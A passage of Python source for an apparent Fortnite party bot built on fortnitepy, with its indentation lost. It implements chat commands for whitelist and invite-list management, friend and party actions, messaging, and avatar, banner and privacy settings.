users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removewhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removewhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in whitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['get']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['get']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'```\n{x}\n```',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')
else:
client.select[message.author.id] = {
"exec": [
"""\
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'>>> {x}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_get_userinfo')}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['friendcount']:
try:
send(display_name,f"{l('friendcount')}: {len(client.friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('friendcount')}: {len(client.friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendingcount']:
try:
send(display_name,f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockcount']:
try:
send(display_name,f"{l('blockcount')}: {len(client.blocked_users)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('blockcount')}: {len(client.blocked_users)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['friendlist']:
try:
text = ''
for friend in client.friends:
client.add_cache(friend)
text += f'\n{name(friend)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendinglist']:
try:
outgoing = ''
incoming = ''
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
outgoing += f'\n{name(pending)}'
elif pending.incoming:
incoming += f'\n{name(pending)}'
send(display_name,f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blocklist']:
try:
text = ''
for block in client.blocked_users:
client.add_cache(block)
text += f'\n{name(block)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
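# wait: decline party invites for waitinterval seconds; a Timer calls client.inviteaccept
# to re-enable them. While invites are already off, only owners (or whitelisted users,
# when the config allows) may restart the timer.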
elif args[0] in commands['wait']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
client.acceptinvite = False
try:
client.timer_.cancel()
except AttributeError:
pass
client.timer_ = Timer(data['fortnite']['waitinterval'], client.inviteaccept)
client.timer_.start()
await reply(message, client, l('decline_invite_for', str(data['fortnite']['waitinterval'])))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['join']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['join']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_joining_to_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"{l('enter_to_join_party')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_joining_to_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['joinid']:
try:
await client.join_party(party_id=args[1])
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['join']}] [{l('party_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['leave']:
try:
await client.party.me.leave()
await reply(message, client, l('party_leave', client.party.id))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_leaving_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['invite']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['invite']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_partyinvite'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_invite_user')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_partyinvite'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['inviteall']:
try:
for inviteuser in client.invitelist:
    loop.create_task(client.party.invite(inviteuser))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['message']:
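# message: the body is split on ' : ' — text[0] selects the friend by name/ID and
# text[1] is the whisper to send; a missing separator falls through to the IndexError handler.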
try:
text = rawcontent.split(' : ')
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(text[0])
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))""" for user in users.values()
],
"variable": [
{"user": user, "text": text} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['message']}] [{l('name_or_id')}] : [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['partymessage']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['partymessage']}] [{l('content')}]")
return
await client.party.send(rawcontent)
await reply(message, client, l('party_sent', client.party.id, rawcontent))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['sendall']:
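# sendall: replay the content as a command on every loaded client via AllMessage and
# process_command, then relay each client's collected results back to the author.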
try:
if rawcontent == '':
await reply(message, client, f"[{commands['sendall']}] [{l('content')}]")
return
tasks = {}
for client_ in loadedclients:
mes = AllMessage(rawcontent, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result
if result.get(client_.user.id):
results = '\n'.join(result[client_.user.id])
await reply(message, client, f"[{name(client_.user)}] {results}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['status']:
try:
client.status_ = rawcontent
await client.change_status()
await reply(message, client, l('set_to', l('status'), rawcontent))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['status']}] [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['avatar']:
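# avatar: args[1] is the Kairos asset ID; three extra arguments are raw background
# colours, a single extra argument names a KairosBackgroundColorPreset, and no extra
# arguments leave the background unset.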
try:
if rawcontent == '':
await reply(message, client, f"[{commands['avatar']}] [ID]")
return
if len(args) > 4:
background_colors = [args[2], args[3], args[4]]
elif len(args) == 2:
background_colors = None
else:
background_colors = getattr(fortnitepy.KairosBackgroundColorPreset, args[2])
avatar = fortnitepy.Avatar(asset=args[1], background_colors=background_colors)
client.set_avatar(avatar)
await reply(message, client, l('set_to', l('avatar'), f"{args[1]}, {background_colors}"))
except AttributeError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('color_must_be'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['banner']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,args[1],args[2],client.party.me.banner[2]))
await reply(message, client, l('set_to', l('banner'), f"{args[1]}, {args[2]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['banner']}] [{l('bannerid')}] [{l('color')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['level']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,client.party.me.banner[0],client.party.me.banner[1],int(args[1])))
await reply(message, client, l('set_to', l('level'), args[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('must_be_int'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['level']}] [{l('level')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['bp']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_battlepass_info,True,args[1],args[2],args[3]))
await reply(message, client, l('set_to', l('bpinfo'), f"{l('tier')}: {args[1]}, {l('xpboost')}: {args[2]}, {l('friendxpboost')}: {args[3]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_bpinfo'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['bp']}] [{l('tier')}] [{l('xpboost')}] [{l('friendxpboost')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['privacy']:
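# privacy: map the matching sub-command onto a PartyPrivacy enum member and apply it
# to the current party.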
try:
privacies = [
"privacy_public",
"privacy_friends_allow_friends_of_friends",
"privacy_friends",
"privacy_private_allow_friends_of_friends",
"privacy_private"
]
for privacy in privacies:
if args[1] in commands[privacy]:
priv = getattr(PartyPrivacy,privacy.replace("privacy_","",1).upper()).value
await client.party.set_privacy(priv)
